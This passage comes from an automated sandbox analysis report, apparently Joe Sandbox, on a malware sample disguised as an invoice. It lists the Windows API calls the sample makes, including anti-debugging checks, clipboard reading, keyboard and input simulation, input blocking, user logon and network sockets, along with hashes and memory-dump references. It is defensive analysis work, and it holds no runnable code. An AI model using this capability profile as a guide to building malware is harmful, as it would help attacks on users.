                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                              • String ID: *.*$\VH
                              • API String ID: 2786137511-2657498754
                              • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                              • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                              • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                              • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                              APIs
                              • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                              • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                              • TerminateProcess.KERNEL32(00000000), ref: 00422004
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                              • String ID: pqI
                              • API String ID: 2579439406-2459173057
                              • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                              • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                              • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                              • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                              APIs
                              • __wcsicoll.LIBCMT ref: 00433349
                              • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                              • __wcsicoll.LIBCMT ref: 00433375
                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __wcsicollmouse_event
                              • String ID: DOWN
                              • API String ID: 1033544147-711622031
                              • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                              • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                              • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                              • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                              APIs
                              • GetKeyboardState.USER32(?), ref: 0044C3D2
                              • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                              • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                              • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                              • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: KeyboardMessagePostState$InputSend
                              • String ID:
                              • API String ID: 3031425849-0
                              • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                              • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                              • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                              • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                              APIs
                                • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                              • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                              • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ErrorLastinet_addrsocket
                              • String ID:
                              • API String ID: 4170576061-0
                              • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                              • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                              • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                              • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                              APIs
                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                              • IsWindowVisible.USER32 ref: 0047A368
                              • IsWindowEnabled.USER32 ref: 0047A378
                              • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                              • IsIconic.USER32 ref: 0047A393
                              • IsZoomed.USER32 ref: 0047A3A1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                              • String ID:
                              • API String ID: 292994002-0
                              • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                              • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                              • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                              • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                              APIs
                                • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                              • CoInitialize.OLE32(00000000), ref: 00478442
                              • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                              • CoUninitialize.OLE32 ref: 0047863C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                              • String ID: .lnk
                              • API String ID: 886957087-24824748
                              • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                              • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                              • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                              • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                              APIs
                              • OpenClipboard.USER32(?), ref: 0046DCE7
                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                              • GetClipboardData.USER32(0000000D), ref: 0046DD01
                              • CloseClipboard.USER32 ref: 0046DD0D
                              • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                              • CloseClipboard.USER32 ref: 0046DD41
                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                              • GetClipboardData.USER32(00000001), ref: 0046DD8D
                              • CloseClipboard.USER32 ref: 0046DD99
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                              • String ID:
                              • API String ID: 15083398-0
                              • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                              • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                              • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                              • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: U$\
                              • API String ID: 4104443479-100911408
                              • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                              • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                              • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                              • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                              • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Find$File$CloseFirstNext
                              • String ID:
                              • API String ID: 3541575487-0
                              • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                              • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                              • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                              • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                              APIs
                              • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                              • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                              • FindClose.KERNEL32(00000000), ref: 004339EB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: FileFind$AttributesCloseFirst
                              • String ID:
                              • API String ID: 48322524-0
                              • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                              • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                              • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                              • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                              APIs
                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                              • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Internet$AvailableDataErrorFileLastQueryRead
                              • String ID:
                              • API String ID: 901099227-0
                              • Opcode ID: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                              • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                              • Opcode Fuzzy Hash: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                              • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                              APIs
                              • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Proc
                              • String ID:
                              • API String ID: 2346855178-0
                              • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                              • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                              • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                              • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                              APIs
                              • BlockInput.USER32(00000001), ref: 0045A38B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: BlockInput
                              • String ID:
                              • API String ID: 3456056419-0
                              • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                              • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                              • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                              • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                              APIs
                              • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: LogonUser
                              • String ID:
                              • API String ID: 1244722697-0
                              • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                              • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                              • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                              • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                              APIs
                              • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: NameUser
                              • String ID:
                              • API String ID: 2645101109-0
                              • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                              • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                              • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                              • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
